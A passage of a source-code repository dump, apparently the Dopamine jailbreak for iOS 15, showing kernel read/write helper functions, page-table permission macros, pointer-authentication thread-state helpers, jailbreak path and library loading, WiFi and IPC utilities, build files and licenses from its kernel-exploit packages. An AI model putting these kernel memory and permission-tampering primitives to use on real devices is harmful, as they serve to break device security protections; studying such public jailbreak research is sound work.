    kwritebuf(kaddr, &val, sizeof(uint16_t));
}

// Writes an 8-bit value at `kaddr` through kwritebuf (partial-word path).
void kwrite8(uint64_t kaddr, uint8_t val)
{
    kwritebuf(kaddr, &val, sizeof(uint8_t));
}

// Reads a 64-bit value with kread64 and, when bit 55 is set, forces bits 39
// through 63 to 1 before returning it; otherwise the value is returned as read.
// Presumably this restores the upper bits of a kernel pointer whose top bits
// carry other data -- confirm against the callers.
uint64_t kread_ptr(uint64_t kaddr) {
    uint64_t ptr = kread64(kaddr);
    if ((ptr >> 55) & 1) {
        return ptr | 0xFFFFFF8000000000;
    }

    return ptr;
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | uint64_t (^kread64)(uint64_t kaddr); 6 | uint32_t (^kread32)(uint64_t kaddr); 7 | 8 | void (^kwrite64)(uint64_t kaddr, uint64_t val); 9 | void (^kwrite32)(uint64_t kaddr, uint32_t val); 10 | 11 | void kreadbuf(uint64_t kaddr, void* output, size_t size); 12 | void kwritebuf(uint64_t kaddr, void* input, size_t size); 13 | 14 | uint16_t kread16(uint64_t kaddr); 15 | uint8_t kread8(uint64_t kaddr); 16 | 17 | void kwrite16(uint64_t kaddr, uint16_t val); 18 | void kwrite8(uint64_t kaddr, uint8_t val); 19 | 20 | uint64_t kread_ptr(uint64_t kaddr); 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/xprr.h: -------------------------------------------------------------------------------- 1 | // 2 | // xprr.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef xprr_h 10 | #define xprr_h 11 | 12 | #define PTE_TO_PERM(pte) ((((pte) >> 4ULL) & 0xC) | (((pte) >> 52ULL) & 2) | (((pte) >> 54ULL) & 1)) 13 | #define _PERM_TO_PTE(perm) ((((perm) & 0xC) << 4ULL) | (((perm) & 2) << 52ULL) | (((perm) & 1) << 54ULL)) 14 | #define PERM_TO_PTE(perm) _PERM_TO_PTE((uint64_t) (perm)) 15 | 16 | #define PERM_KRW_URW 0x7 // R/W for kernel and user 17 | 18 | #define PTE_NON_GLOBAL (1ULL << 11ULL) 19 | #define PTE_VALID (1ULL << 10ULL) // Access flag 20 | #define PTE_OUTER_SHAREABLE (2ULL << 8ULL) 21 | #define PTE_INNER_SHAREABLE (3ULL << 8ULL) 22 | 23 | #define PTE_LEVEL3_ENTRY (PTE_VALID | 0x3ULL) 24 | 25 | #endif /* xprr_h */ 26 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars Fröder (opa334) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LICENSE_Fugu15.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | all %: 3 | @./BaseBin/pack.sh 4 | @xattr -rc Tools >/dev/null 2>&1 5 | $(MAKE) -C Exploits/oobPCI $@ 6 | $(MAKE) -C Dopamine $@ 7 | 8 | clean: 9 | @./BaseBin/clean.sh 10 | 11 | update: all 12 | @./jbupdate.sh 13 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Fugu15KernelExploit", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "Fugu15KernelExploit", 16 | targets: ["Fugu15KernelExploit"]) 17 | ], 18 | dependencies: [ 19 | .package(url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(path: "../ProcessCommunication"), 21 | .package(url: "https://github.com/pinauten/PatchfinderUtils", .branch("master")), 22 | .package(url: "https://github.com/opa334/KernelPatchfinder", .branch("master")), 23 | ], 24 | targets: [ 25 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 
26 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 27 | .target(name: "CBindings"), 28 | .target( 29 | name: "Fugu15KernelExploit", 30 | dependencies: ["CBindings", "SwiftUtils", "ProcessCommunication", "PatchfinderUtils", "KernelPatchfinder"]), 31 | ] 32 | ) 33 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/README.md: -------------------------------------------------------------------------------- 1 | # Fugu15KernelExploit 2 | 3 | This package can be used to easily launch the Fugu15 kernel exploit and use it's capabilities. 4 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/CBindings.h: -------------------------------------------------------------------------------- 1 | // 2 | // CBindings.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef CBindings_h 10 | #define CBindings_h 11 | 12 | #import 13 | #include 14 | #include 15 | #include 16 | 17 | #include "../../../../../Dopamine/Dopamine/constants.h" 18 | #include "libjailbreak.h" 19 | #include "posix_spawn.h" 20 | #include "th_state.h" 21 | #include "wifi.h" 22 | 23 | extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path); 24 | extern int loadEmbeddedSignature(NSString* filePath); 25 | uint64_t getPCIMemorySize(void); 26 | NSString *getBootManifestHash(void); 27 | 28 | // Also define some IOKit stuff... 
29 | extern const mach_port_t kIOMainPortDefault; 30 | 31 | extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); 32 | extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, 33 | CFAllocatorRef __nullable allocator, 34 | uint32_t options); 35 | extern kern_return_t IOObjectRelease(mach_port_t object); 36 | 37 | extern uint64_t reboot3(uint64_t how, uint64_t unk); 38 | 39 | #endif /* CBindings_h */ 40 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/th_state.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 
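20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | 24 | #ifndef TH_STATE_H_ 25 | #define TH_STATE_H_ 26 | 27 | #include 28 | #include 29 | 30 | #ifdef __arm64__ 31 | 32 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts); 33 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc); 34 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts); 35 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr); 36 | 37 | #endif /* defined __arm64__ */ 38 | 39 | struct exception_message_reply { 40 | mach_msg_header_t hdr; 41 | NDR_record_t NDR; 42 | kern_return_t result; 43 | }; 44 | 45 | #endif /* !defined TH_STATE_H_ */ 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/wifi.h: -------------------------------------------------------------------------------- 1 | bool wifiIsEnabled(void); 2 | void setWifiEnabled(bool enabled); -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/libjailbreak.m: --------------------------------------------------------------------------------
#include
#import
#import

void *libJailbreakHandle = NULL;

/*
 * Returns the jailbreak root directory, with `path` appended when it is non-nil.
 *
 * The root is resolved once per process: the "boot-manifest-hash" property of
 * IODeviceTree:/chosen is hex-encoded, and the first "jb-*" entry found in
 * /private/preboot/<hash>/ supplies "<entry>/procursus". When the hash cannot
 * be read, the root falls back to /var/jb. When the hash is read but no "jb-*"
 * entry exists, the root stays nil and this function returns nil, so callers
 * have to check the result before using it as a path.
 */
NSString *prebootPath(NSString *path)
{
    static NSString *sPrebootPrefix = nil;
    static dispatch_once_t onceToken;
    dispatch_once (&onceToken, ^{
        // Explicitly nil: the fallback branch below tests this variable even
        // when the registry lookup fails and nothing was ever assigned.
        NSMutableString *bootManifestHashStr = nil;
        // NOTE(review): registryEntry is not released in this function.
        io_registry_entry_t registryEntry = IORegistryEntryFromPath(kIOMainPortDefault, "IODeviceTree:/chosen");
        if (registryEntry) {
            CFTypeRef property = IORegistryEntryCreateCFProperty(registryEntry, CFSTR("boot-manifest-hash"), kCFAllocatorDefault, 0);
            if (property) {
                // Only treat the property as bytes when it really is CFData.
                if (CFGetTypeID(property) == CFDataGetTypeID()) {
                    CFDataRef bootManifestHash = (CFDataRef)property;
                    const UInt8 *buffer = CFDataGetBytePtr(bootManifestHash);
                    CFIndex length = CFDataGetLength(bootManifestHash);
                    bootManifestHashStr = [NSMutableString stringWithCapacity:(length * 2)];
                    for (CFIndex i = 0; i < length; i++) {
                        [bootManifestHashStr appendFormat:@"%02X", buffer[i]];
                    }
                }
                CFRelease(property);
            }
        }

        if (bootManifestHashStr) {
            NSString *activePrebootPath = [@"/private/preboot/" stringByAppendingPathComponent:bootManifestHashStr];
            NSArray *subItems = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:activePrebootPath error:nil];
            for (NSString *subItem in subItems) {
                if ([subItem hasPrefix:@"jb-"]) {
                    sPrebootPrefix = [[activePrebootPath stringByAppendingPathComponent:subItem] stringByAppendingPathComponent:@"procursus"];
                    break;
                }
            }
        }
        else {
            sPrebootPrefix = @"/var/jb";
        }
    });

    if (path) {
        return [sPrebootPrefix stringByAppendingPathComponent:path];
    }
    return sPrebootPrefix;
}

/*
 * Loads basebin/libjailbreak.dylib from the jailbreak root and caches the handle.
 *
 * Returns the cached or newly opened handle, or NULL when the root could not
 * be resolved or dlopen() failed.
 */
void *loadLibJailbreak(void)
{
    if (libJailbreakHandle) return libJailbreakHandle;

    // prebootPath() can return nil. A nil string yields a NULL C path, and
    // dlopen(NULL, ...) returns a handle for the main program instead of
    // failing, which would be cached here as if the library had been loaded.
    NSString *libraryPath = prebootPath(@"basebin/libjailbreak.dylib");
    if (!libraryPath) return NULL;

    libJailbreakHandle = dlopen(libraryPath.UTF8String, RTLD_NOW);
    return libJailbreakHandle;
}
-------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/pci_offset.m: --------------------------------------------------------------------------------
#import
#import
#import

/*
 * Returns the "length" of the first IODeviceMemory range of the IOPCIDevice
 * service named "wlan", or 0 when the service, the property or the expected
 * array/dictionary layout is missing.
 */
uint64_t getPCIMemorySize(void)
{
    uint64_t pciMemorySize = 0;

    io_iterator_t iterator;
    kern_return_t kr;

    kr = IOServiceGetMatchingServices(kIOMainPortDefault, IOServiceMatching("IOPCIDevice"), &iterator);
    if (kr != KERN_SUCCESS) {
        printf("Error finding IOPCIDevice: %x\n", kr);
        return 0;
    }

    io_service_t service;
    while ((service = IOIteratorNext(iterator))) {
        io_name_t name;
        kr = IORegistryEntryGetName(service, name);
        if (kr == KERN_SUCCESS && strcmp(name, "wlan") == 0) {
            CFMutableDictionaryRef properties = NULL;
            kr = IORegistryEntryCreateCFProperties(service, &properties, kCFAllocatorDefault, kNilOptions);
            if (kr == KERN_SUCCESS && properties) {
                // CFDictionaryGetValue returns NULL for a missing key, and
                // CFGetTypeID must not be called on NULL.
                CFTypeRef memory = CFDictionaryGetValue(properties, CFSTR("IODeviceMemory"));
                if (memory && CFGetTypeID(memory) == CFArrayGetTypeID()) {
                    // Expected layout: [[{ "length": NSNumber, ... }, ...], ...].
                    // Each level is type-checked so a different layout yields 0
                    // instead of an unrecognized-selector exception.
                    NSArray *ranges = (__bridge NSArray *)memory;
                    id firstRange = ranges.firstObject;
                    id firstEntry = [firstRange isKindOfClass:[NSArray class]] ? [(NSArray *)firstRange firstObject] : nil;
                    id length = [firstEntry isKindOfClass:[NSDictionary class]] ? ((NSDictionary *)firstEntry)[@"length"] : nil;
                    if ([length isKindOfClass:[NSNumber class]]) {
                        pciMemorySize = [(NSNumber *)length unsignedLongLongValue];
                    }
                }
                CFRelease(properties);
            }
        }
        IOObjectRelease(service);
    }
    IOObjectRelease(iterator);

    return pciMemorySize;
}
-------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/th_state.c: -------------------------------------------------------------------------------- 1 | // 2 | // th_state.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved.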
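7 | // 8 | 9 | #include 10 | #include 11 | 12 | #ifdef __arm64__ 13 | 14 | #include 15 | 16 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts) { 17 | return arm_thread_state64_get_pc(*ts); 18 | } 19 | 20 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc) { 21 | void *ptr = ptrauth_sign_unauthenticated((void*)pc, ptrauth_key_function_pointer, 0); 22 | arm_thread_state64_set_pc_fptr(*ts, ptr); 23 | } 24 | 25 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts) { 26 | return arm_thread_state64_get_lr(*ts); 27 | } 28 | 29 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr) { 30 | void *ptr = ptrauth_sign_unauthenticated((void*)lr, ptrauth_key_function_pointer, 0); 31 | arm_thread_state64_set_lr_fptr(*ts, ptr); 32 | } 33 | 34 | #endif /* defined __arm64__ */ 35 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/wifi.m: --------------------------------------------------------------------------------
#import
#import

// Resolved at runtime by loadWifiManager(). Any of these stays NULL when the
// framework or one of its symbols cannot be found.
void *wifiManager = NULL;
void *(*WiFiManagerClientCreate)(CFAllocatorRef allocator, int flags);
CFPropertyListRef (*WiFiManagerClientCopyProperty)(void *manager, CFStringRef property);
void (*WiFiManagerClientSetProperty)(void *manager, CFStringRef property, CFPropertyListRef value);

/*
 * Opens the MobileWiFi private framework once per process, resolves the three
 * client functions and creates the manager client. Every step is checked so a
 * missing framework or symbol leaves the globals NULL instead of calling
 * through a NULL function pointer.
 */
void loadWifiManager(void)
{
    static dispatch_once_t onceToken;
    dispatch_once (&onceToken, ^{
        void *wifiHandle = dlopen("/System/Library/PrivateFrameworks/MobileWiFi.framework/MobileWiFi", RTLD_NOW);
        if (!wifiHandle) return;

        WiFiManagerClientCreate = dlsym(wifiHandle, "WiFiManagerClientCreate");
        WiFiManagerClientCopyProperty = dlsym(wifiHandle, "WiFiManagerClientCopyProperty");
        WiFiManagerClientSetProperty = dlsym(wifiHandle, "WiFiManagerClientSetProperty");

        if (WiFiManagerClientCreate) {
            wifiManager = WiFiManagerClientCreate(kCFAllocatorDefault, 0);
        }
    });
}

/*
 * Returns the boolean value of the manager's "AllowEnable" property.
 * Returns false when the manager or the accessor is unavailable, or when the
 * property is missing or not a CFBoolean.
 */
bool wifiIsEnabled(void)
{
    loadWifiManager();
    if (!wifiManager || !WiFiManagerClientCopyProperty) return false;

    bool isEnabledBool = false;
    CFPropertyListRef isEnabled = WiFiManagerClientCopyProperty(wifiManager, CFSTR("AllowEnable"));
    if (isEnabled) {
        // The copied value is an untyped property list; check the type before
        // reading it as a boolean.
        if (CFGetTypeID(isEnabled) == CFBooleanGetTypeID()) {
            isEnabledBool = CFBooleanGetValue((CFBooleanRef)isEnabled);
        }
        CFRelease(isEnabled);
    }
    return isEnabledBool;
}

/*
 * Sets the manager's "AllowEnable" property to `enabled`.
 * Does nothing when the manager or the setter is unavailable.
 */
void setWifiEnabled(bool enabled)
{
    loadWifiManager();
    if (!wifiManager || !WiFiManagerClientSetProperty) return;

    WiFiManagerClientSetProperty(wifiManager, CFSTR("AllowEnable"), enabled ? kCFBooleanTrue : kCFBooleanFalse);
}
-------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly.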
18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/Fugu15KernelExploit/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 
//

import Foundation

/// Process-wide logging helper: every message goes to NSLog and, when
/// `logFileHandle` is set, is also appended to that handle as one UTF-8 line.
class Logger {
    // Optional second sink; nil means messages go to NSLog only.
    static var logFileHandle: FileHandle?

    /// Logs `s` verbatim. The text is passed to NSLog as an argument of a
    /// constant "%@" format, so format specifiers inside `s` are not interpreted.
    /// Errors while writing to `logFileHandle` are ignored.
    static func print(_ s: String) {
        NSLog("%@", s)

        guard let handle = logFileHandle else { return }
        let line = s + "\n"
        try? handle.write(contentsOf: line.data(using: .utf8) ?? Data())
    }

    /// Renders `s` as a format string with `args` and logs the result.
    /// `s` is interpreted as a format, so callers should pass a constant
    /// format and put variable text in `args`.
    static func fmt(_ s: String, _ args: CVarArg...) {
        let rendered = String(format: s, arguments: args)
        print(rendered)
    }

    /// Logs `s` with a "Status: " prefix.
    static func status(_ s: String) {
        print("Status: \(s)")
    }
}
-------------------------------------------------------------------------------- /Packages/ProcessCommunication/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "ProcessCommunication", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "ProcessCommunication", 16 | targets: ["ProcessCommunication"]) 17 | ], 18 | targets: [ 19 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 20 | // Targets can depend on other targets in this package, and on products in packages this package depends on.
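21 | .target( 22 | name: "ProcessCommunication", 23 | dependencies: []), 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/README.md: -------------------------------------------------------------------------------- 1 | # ProcessCommunication 2 | 3 | Simple process communication library. 4 | -------------------------------------------------------------------------------- /Packages/ProcessCommunication/Sources/ProcessCommunication/ProcessCommunication.swift: --------------------------------------------------------------------------------
//
// ProcessCommunication.swift
// ProcessCommunication
//
// Created by Linus Henze.
// Copyright © 2021/2022 Pinauten GmbH. All rights reserved.
//

import Foundation

/// Exchanges commands (lists of strings) over a pair of file handles.
///
/// Wire format: the UTF-8 bytes of each argument, with a 0x01 byte between
/// arguments and a 0x00 byte after the last one. The two delimiter bytes
/// therefore cannot appear inside an argument.
public class ProcessCommunication {
    public let read: FileHandle
    public let write: FileHandle

    public init(read: FileHandle, write: FileHandle) {
        self.read = read
        self.write = write
    }

    /// Reads one command from `read`, one byte at a time.
    ///
    /// - Returns: The arguments of the command, or `nil` on end of file or on
    ///   a read error. An argument that is not valid UTF-8 is returned as "".
    ///
    /// NOTE(review): the argument buffer grows until a delimiter arrives;
    /// there is no cap on how much data the peer can make this method hold.
    public func receiveCommand() -> [String]? {
        var result: [String] = []
        var buf = Data()
        while true {
            guard let data = try? read.read(upToCount: 1), let byte = data.first else {
                return nil
            }

            switch byte {
            case 0:
                // End of command.
                result.append(String(data: buf, encoding: .utf8) ?? "")
                return result
            case 1:
                // End of argument, more follow.
                result.append(String(data: buf, encoding: .utf8) ?? "")
                buf = Data()
            default:
                buf.append(byte)
            }
        }
    }

    /// Writes one command to `write`.
    ///
    /// An argument containing a 0x00 or 0x01 byte would be read by the
    /// receiver as a delimiter, splitting or ending the command early, so
    /// such commands are rejected before anything is written.
    ///
    /// - Returns: `true` when every write succeeded; `false` when an argument
    ///   contains a delimiter byte or a write failed. After a failed write the
    ///   stream may hold a partial command. An empty `args` writes nothing and
    ///   returns `true`.
    @discardableResult
    public func sendCommand(_ args: [String]) -> Bool {
        let collidesWithFraming = args.contains { arg in
            arg.utf8.contains { $0 == 0 || $0 == 1 }
        }
        if collidesWithFraming {
            return false
        }

        do {
            for (index, arg) in args.enumerated() {
                try write.write(contentsOf: Data(arg.utf8))

                let delimiter: UInt8 = (index == args.count - 1) ? 0 : 1
                try write.write(contentsOf: Data(repeating: delimiter, count: 1))
            }

            return true
        } catch _ {
            return false
        }
    }

    /// Variadic convenience form of `sendCommand(_:)`.
    @discardableResult
    public func sendCommand(_ args: String...) -> Bool {
        sendCommand(args)
    }
}
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # Dopamine 4 | 5 | Rootless arm64e jailbreak for iOS 15.0 - 15.4.1. More details will follow here soon. 6 | 7 | Official website / download: https://ellekit.space/dopamine/ 8 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Exe2Driver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Tools/Exe2Driver/Exe2Driver -------------------------------------------------------------------------------- /Tools/Exe2Driver/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=Exe2Driver 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL":
"https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Exe2Driver", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "Exe2Driver", 15 | targets: ["Exe2Driver"]), 16 | ], 17 | dependencies: [ 18 | // Dependencies declare other packages that this package depends on. NOTE(review): both track the moving `master` branch, so the commits actually built are the ones recorded in Package.resolved; keep that file committed and review any change to its revisions. 19 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 21 | ], 22 | targets: [ 23 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 24 | // Targets can depend on other targets in this package, and on products in packages this package depends on.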
